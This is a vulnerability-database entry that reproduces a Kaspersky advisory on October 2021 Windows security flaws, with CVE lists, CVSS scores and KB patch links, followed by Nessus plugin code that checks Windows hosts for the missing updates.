DATABASE RESOURCES PRICING ABOUT US

{"id": "KLA12309", "vendorId": null, "type": "kaspersky", "bulletinFamily": "info", "title": "KLA12309 Multiple vulnerabilities in Microsoft Products (ESU)", "description": "### *Detect date*:\n10/12/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to spoof user interface, obtain sensitive information, gain privileges, execute arbitrary code, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 for 32-bit Systems \nWindows Server, version 2004 (Server Core installation) \nWindows RT 8.1 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server, version 20H2 (Server Core Installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 11 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2012 R2 \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2022 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 11 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2012 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019 \nWindows Server 2022 \nWindows Server 2012 R2 (Server Core installation) \nWindows 8.1 for x64-based systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 8.1 for 32-bit systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-36970](<https://nvd.nist.gov/vuln/detail/CVE-2021-36970>) \n[CVE-2021-40455](<https://nvd.nist.gov/vuln/detail/CVE-2021-40455>) \n[CVE-2021-38662](<https://nvd.nist.gov/vuln/detail/CVE-2021-38662>) \n[CVE-2021-41335](<https://nvd.nist.gov/vuln/detail/CVE-2021-41335>) \n[CVE-2021-40449](<https://nvd.nist.gov/vuln/detail/CVE-2021-40449>) \n[CVE-2021-38663](<https://nvd.nist.gov/vuln/detail/CVE-2021-38663>) \n[CVE-2021-41342](<https://nvd.nist.gov/vuln/detail/CVE-2021-41342>) \n[CVE-2021-26442](<https://nvd.nist.gov/vuln/detail/CVE-2021-26442>) \n[CVE-2021-41332](<https://nvd.nist.gov/vuln/detail/CVE-2021-41332>) \n[CVE-2021-40466](<https://nvd.nist.gov/vuln/detail/CVE-2021-40466>) \n[CVE-2021-41331](<https://nvd.nist.gov/vuln/detail/CVE-2021-41331>) \n[CVE-2021-40469](<https://nvd.nist.gov/vuln/detail/CVE-2021-40469>) \n[CVE-2021-41340](<https://nvd.nist.gov/vuln/detail/CVE-2021-41340>) \n[CVE-2021-40467](<https://nvd.nist.gov/vuln/detail/CVE-2021-40467>) \n[CVE-2021-36953](<https://nvd.nist.gov/vuln/detail/CVE-2021-36953>) \n[CVE-2021-40489](<https://nvd.nist.gov/vuln/detail/CVE-2021-40489>) \n[CVE-2021-40443](<https://nvd.nist.gov/vuln/detail/CVE-2021-40443>) \n[CVE-2021-40460](<https://nvd.nist.gov/vuln/detail/CVE-2021-40460>) \n[CVE-2021-40465](<https://nvd.nist.gov/vuln/detail/CVE-2021-40465>) \n[CVE-2021-41343](<https://nvd.nist.gov/vuln/detail/CVE-2021-41343>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-36970](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36970>)4.3Warning \n[CVE-2021-40455](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40455>)2.1Warning \n[CVE-2021-38662](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38662>)4.9Warning \n[CVE-2021-41335](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41335>)7.2High \n[CVE-2021-40449](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40449>)4.6Warning \n[CVE-2021-38663](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38663>)2.1Warning \n[CVE-2021-41342](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41342>)6.8High \n[CVE-2021-26442](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26442>)4.6Warning \n[CVE-2021-41332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41332>)4.0Warning \n[CVE-2021-40466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40466>)4.6Warning \n[CVE-2021-41331](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41331>)6.8High \n[CVE-2021-40469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40469>)6.5High \n[CVE-2021-41340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41340>)6.8High \n[CVE-2021-40467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40467>)4.6Warning \n[CVE-2021-36953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36953>)5.0Critical \n[CVE-2021-40489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40489>)7.2High \n[CVE-2021-40443](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40443>)4.6Warning \n[CVE-2021-40460](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40460>)4.0Warning \n[CVE-2021-40465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40465>)6.8High \n[CVE-2021-41343](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41343>)2.1Warning\n\n### *KB list*:\n[5006671](<http://support.microsoft.com/kb/5006671>) \n[5006736](<http://support.microsoft.com/kb/5006736>) \n[5006743](<http://support.microsoft.com/kb/5006743>) \n[5006728](<http://support.microsoft.com/kb/5006728>) \n[5006715](<http://support.microsoft.com/kb/5006715>)\n\n### *Microsoft official advisories*:", "published": "2021-10-12T00:00:00", "modified": "2022-01-18T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA12309/", "reporter": "Kaspersky Lab", "references": ["https://threats.kaspersky.com/en/class/Exploit/", "https://nvd.nist.gov/vuln/detail/CVE-2021-36970", "https://nvd.nist.gov/vuln/detail/CVE-2021-40455", "https://nvd.nist.gov/vuln/detail/CVE-2021-38662", "https://nvd.nist.gov/vuln/detail/CVE-2021-41335", "https://nvd.nist.gov/vuln/detail/CVE-2021-40449", "https://nvd.nist.gov/vuln/detail/CVE-2021-38663", "https://nvd.nist.gov/vuln/detail/CVE-2021-41342", "https://nvd.nist.gov/vuln/detail/CVE-2021-26442", "https://nvd.nist.gov/vuln/detail/CVE-2021-41332", "https://nvd.nist.gov/vuln/detail/CVE-2021-40466", "https://nvd.nist.gov/vuln/detail/CVE-2021-41331", "https://nvd.nist.gov/vuln/detail/CVE-2021-40469", "https://nvd.nist.gov/vuln/detail/CVE-2021-41340", "https://nvd.nist.gov/vuln/detail/CVE-2021-40467", "https://nvd.nist.gov/vuln/detail/CVE-2021-36953", "https://nvd.nist.gov/vuln/detail/CVE-2021-40489", "https://nvd.nist.gov/vuln/detail/CVE-2021-40443", "https://nvd.nist.gov/vuln/detail/CVE-2021-40460", "https://nvd.nist.gov/vuln/detail/CVE-2021-40465", "https://nvd.nist.gov/vuln/detail/CVE-2021-41343", "https://threats.kaspersky.com/en/product/Microsoft-Windows/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2012/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-8/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-7/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2008/", "https://threats.kaspersky.com/en/product/Windows-RT/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-10/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2016/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2019/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36970", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40455", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38662", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41335", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40449", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38663", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41342", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26442", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41332", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40466", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41331", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40469", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41340", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40467", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36953", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40489", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40443", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40460", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40465", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41343", "http://support.microsoft.com/kb/5006671", "http://support.microsoft.com/kb/5006736", "http://support.microsoft.com/kb/5006743", "http://support.microsoft.com/kb/5006728", "http://support.microsoft.com/kb/5006715", "https://portal.msrc.microsoft.com/en-us/security-guidance", "https://statistics.securelist.com/vulnerability-scan/month"], "cvelist": ["CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40455", "CVE-2021-40460", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40469", "CVE-2021-40489", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41335", "CVE-2021-41340", "CVE-2021-41342", "CVE-2021-41343"], "immutableFields": [], "lastseen": "2022-01-19T17:39:29", "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:248E5B51-C3A0-4459-AF44-2E0C5544549E", "AKB:9A5930ED-FA6C-489A-91EE-74D16A17A639", "AKB:E1AE2609-3DC3-419D-B0AC-353401171F59"]}, {"type": "avleonov", "idList": ["AVLEONOV:99215B2D7808C46D8762AD712CD3D267"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0735", "CPAI-2021-0736", "CPAI-2021-0737", "CPAI-2021-0739"]}, {"type": "cisa", "idList": ["CISA:D12090E3D1C36426271DE8458FFF31E4"]}, {"type": "cve", "idList": ["CVE-2021-26441", "CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40450", "CVE-2021-40455", "CVE-2021-40460", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40469", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41335", "CVE-2021-41340", "CVE-2021-41342", "CVE-2021-41343", "CVE-2021-41345", "CVE-2021-41357"]}, {"type": "githubexploit", "idList": ["059CF457-59E4-5647-A0BC-0014C543D6D3", "07E9B4B7-D316-5CFB-BB6E-CAB4F7217BD4", "67AC7DCE-FB2F-5A78-AB0A-F4A37D19901F", "76666F17-9DF5-5F98-947E-FFDF631368B5", "94F9D54F-CE33-561C-A65A-3C28F00AF2AD", "B45F7278-2C20-5C06-B834-59D960047852"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hivepro", "idList": ["HIVEPRO:19810CA69EE792A741AC657E50CAAAEE"]}, {"type": "kaspersky", "idList": ["KLA12310"]}, {"type": "krebs", "idList": ["KREBS:99411879A64BD5F899F5CD4CD59A9A1C"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B448D31E6691905EFC547FAA3B80C971"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2021_40449-"]}, {"type": "mscve", "idList": ["MS:CVE-2021-26441", "MS:CVE-2021-26442", "MS:CVE-2021-36953", "MS:CVE-2021-36970", "MS:CVE-2021-38662", "MS:CVE-2021-38663", "MS:CVE-2021-40443", "MS:CVE-2021-40449", "MS:CVE-2021-40450", "MS:CVE-2021-40455", "MS:CVE-2021-40460", "MS:CVE-2021-40465", "MS:CVE-2021-40466", "MS:CVE-2021-40467", "MS:CVE-2021-40469", "MS:CVE-2021-40478", "MS:CVE-2021-40488", "MS:CVE-2021-40489", "MS:CVE-2021-41331", "MS:CVE-2021-41332", "MS:CVE-2021-41335", "MS:CVE-2021-41340", "MS:CVE-2021-41342", "MS:CVE-2021-41343", "MS:CVE-2021-41345", "MS:CVE-2021-41357"]}, {"type": "mskb", "idList": ["KB5006671", "KB5006714", "KB5006715", "KB5006728", "KB5006729", "KB5006732", "KB5006736", "KB5006739", "KB5006743"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_OCT_5006667.NASL", "SMB_NT_MS21_OCT_5006669.NASL", "SMB_NT_MS21_OCT_5006670.NASL", "SMB_NT_MS21_OCT_5006672.NASL", "SMB_NT_MS21_OCT_5006674.NASL", "SMB_NT_MS21_OCT_5006675.NASL", "SMB_NT_MS21_OCT_5006699.NASL", "SMB_NT_MS21_OCT_5006715.NASL", "SMB_NT_MS21_OCT_5006728.NASL", "SMB_NT_MS21_OCT_5006729.NASL", "SMB_NT_MS21_OCT_5006732.NASL", "SMB_NT_MS21_OCT_INTERNET_EXPLORER.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164926"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:2BC91C96B1F3F528B6AC9D1724739ED2"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:73EAE8A2825E9B6764F314122B4E5F25", "RAPID7BLOG:7805FE8CEF45482B462D2B4F7A9F7F75"]}, {"type": "securelist", "idList": ["SECURELIST:1F59148E6615695438F94EF4956585AA", "SECURELIST:EDEDB5540F9CBEF736A91ECDD708D038"]}, {"type": "thn", "idList": ["THN:57C3D6DDFA31EA2EA2B6BF2A747A612C"]}, {"type": "threatpost", "idList": ["THREATPOST:500777B41EEA368E3AC2A6AED65C4A25", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16"]}, {"type": "zdi", "idList": ["ZDI-21-1156"]}, {"type": "zdt", "idList": ["1337DAY-ID-37026"]}]}, "score": {"value": 2.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:248E5B51-C3A0-4459-AF44-2E0C5544549E"]}, {"type": "avleonov", "idList": ["AVLEONOV:99215B2D7808C46D8762AD712CD3D267"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0735", "CPAI-2021-0736", "CPAI-2021-0737", "CPAI-2021-0739"]}, {"type": "cisa", "idList": ["CISA:D12090E3D1C36426271DE8458FFF31E4"]}, {"type": "cve", "idList": ["CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40455", "CVE-2021-40460", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40469", "CVE-2021-40489", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41335", "CVE-2021-41340", "CVE-2021-41342", "CVE-2021-41343"]}, {"type": "githubexploit", "idList": ["059CF457-59E4-5647-A0BC-0014C543D6D3", "67AC7DCE-FB2F-5A78-AB0A-F4A37D19901F", "94F9D54F-CE33-561C-A65A-3C28F00AF2AD", "B45F7278-2C20-5C06-B834-59D960047852"]}, {"type": "hivepro", "idList": ["HIVEPRO:19810CA69EE792A741AC657E50CAAAEE"]}, {"type": "kaspersky", "idList": ["KLA12310"]}, {"type": "krebs", "idList": ["KREBS:99411879A64BD5F899F5CD4CD59A9A1C"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B448D31E6691905EFC547FAA3B80C971"]}, {"type": "mscve", "idList": ["MS:CVE-2021-26442", "MS:CVE-2021-36953", "MS:CVE-2021-36970", "MS:CVE-2021-38662", "MS:CVE-2021-38663", "MS:CVE-2021-40443", "MS:CVE-2021-40449", "MS:CVE-2021-40455", "MS:CVE-2021-40460", "MS:CVE-2021-40465", "MS:CVE-2021-40466", "MS:CVE-2021-40467", "MS:CVE-2021-40469", "MS:CVE-2021-40489", "MS:CVE-2021-41331", "MS:CVE-2021-41332", "MS:CVE-2021-41335", "MS:CVE-2021-41340", "MS:CVE-2021-41342", "MS:CVE-2021-41343"]}, {"type": "mskb", "idList": ["KB5006671", "KB5006732"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_OCT_5006667.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164926"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:2BC91C96B1F3F528B6AC9D1724739ED2"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:73EAE8A2825E9B6764F314122B4E5F25"]}, {"type": "securelist", "idList": ["SECURELIST:1F59148E6615695438F94EF4956585AA"]}, {"type": "thn", "idList": ["THN:57C3D6DDFA31EA2EA2B6BF2A747A612C"]}, {"type": "threatpost", "idList": ["THREATPOST:500777B41EEA368E3AC2A6AED65C4A25", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16"]}, {"type": "zdi", "idList": ["ZDI-21-1156"]}, {"type": "zdt", "idList": ["1337DAY-ID-37026"]}]}, "exploitation": null, "vulnersScore": 2.8}, "_state": {"dependencies": 1659988328, "score": 1659960476}, "_internal": {"score_hash": "e21e4c6464fcc2a92611f49794daa780"}}

{"nessus": [{"lastseen": "2022-06-15T18:09:47", "description": "The remote Windows host is missing security update 5006728. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-10-12T00:00:00", "type": "nessus", "title": "KB5006728: Windows 7 and Windows Server 2008 R2 Security Update (October 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40455", "CVE-2021-40460", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40469", "CVE-2021-40489", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41335", "CVE-2021-41340", "CVE-2021-41343"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_OCT_5006728.NASL", "href": "https://www.tenable.com/plugins/nessus/154035", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154035);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26442\",\n \"CVE-2021-36953\",\n \"CVE-2021-36970\",\n \"CVE-2021-38662\",\n \"CVE-2021-38663\",\n \"CVE-2021-40443\",\n \"CVE-2021-40449\",\n \"CVE-2021-40455\",\n \"CVE-2021-40460\",\n \"CVE-2021-40465\",\n \"CVE-2021-40466\",\n \"CVE-2021-40467\",\n \"CVE-2021-40469\",\n \"CVE-2021-40489\",\n \"CVE-2021-41331\",\n \"CVE-2021-41332\",\n \"CVE-2021-41335\",\n \"CVE-2021-41340\",\n \"CVE-2021-41343\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0472-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0475-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"MSKB\", value:\"5006728\");\n script_xref(name:\"MSKB\", value:\"5006743\");\n script_xref(name:\"MSFT\", value:\"MS21-5006728\");\n script_xref(name:\"MSFT\", value:\"MS21-5006743\");\n\n script_name(english:\"KB5006728: Windows 7 and Windows Server 2008 R2 Security Update (October 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5006728. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5006728 or apply Cumulative Update 5006743\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41335\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-41340\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k NtGdiResetDC Use After Free Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-10';\nkbs = make_list(\n '5006728',\n '5006743'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'10_2021',\n bulletin:bulletin,\n rollup_kb_list:[5006728, 5006743])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T18:09:34", "description": "The remote Windows host is missing security update 5006715. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-10-12T00:00:00", "type": "nessus", "title": "KB5006715: Windows Server 2008 Security Update (October 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40455", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40469", "CVE-2021-40489", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41340", "CVE-2021-41343"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_OCT_5006715.NASL", "href": "https://www.tenable.com/plugins/nessus/154043", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154043);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26442\",\n \"CVE-2021-36953\",\n \"CVE-2021-36970\",\n \"CVE-2021-38662\",\n \"CVE-2021-38663\",\n \"CVE-2021-40443\",\n \"CVE-2021-40449\",\n \"CVE-2021-40455\",\n \"CVE-2021-40465\",\n \"CVE-2021-40466\",\n \"CVE-2021-40467\",\n \"CVE-2021-40469\",\n \"CVE-2021-40489\",\n \"CVE-2021-41331\",\n \"CVE-2021-41332\",\n \"CVE-2021-41340\",\n \"CVE-2021-41343\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0472-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0475-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"MSKB\", value:\"5006715\");\n script_xref(name:\"MSKB\", value:\"5006736\");\n script_xref(name:\"MSFT\", value:\"MS21-5006715\");\n script_xref(name:\"MSFT\", value:\"MS21-5006736\");\n\n script_name(english:\"KB5006715: Windows Server 2008 Security Update (October 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5006715. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5006715 or apply Cumulative Update 5006736\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 